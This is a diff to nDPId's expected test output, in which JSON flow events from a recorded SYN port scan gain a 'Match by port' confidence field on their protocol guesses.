 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":822,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":822,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00606{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1940,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1812,"l4_proto":"tcp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1940,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1812,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1940,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1812,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1076,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5907,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1076,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5907,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00606{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1982,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1812,"l4_proto":"tcp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1982,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1812,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1982,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1812,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -4838,7 +4838,7 @@
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1862,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5959,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5959,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00604{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8008,"l4_proto":"tcp","ndpi": {"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}}
+00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8008,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -4850,7 +4850,7 @@
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":865,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1864,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5959,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5959,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00604{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8008,"l4_proto":"tcp","ndpi": {"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}}
+00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8008,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5961,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5961,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -4858,7 +4858,7 @@
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5960,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":940,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1864,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":940,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1864,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00598{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8009,"l4_proto":"tcp","ndpi": {"proto":"AJP","breed":"Acceptable","category":"Web"}}
+00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AJP","breed":"Acceptable","category":"Web"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1947,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5962,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1947,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -4866,15 +4866,15 @@
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3914,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5961,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5961,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00598{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":923,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8010,"l4_proto":"tcp","ndpi": {"proto":"AJP","breed":"Acceptable","category":"Web"}}
+00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":923,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8010,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AJP","breed":"Acceptable","category":"Web"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":923,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00598{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8009,"l4_proto":"tcp","ndpi": {"proto":"AJP","breed":"Acceptable","category":"Web"}}
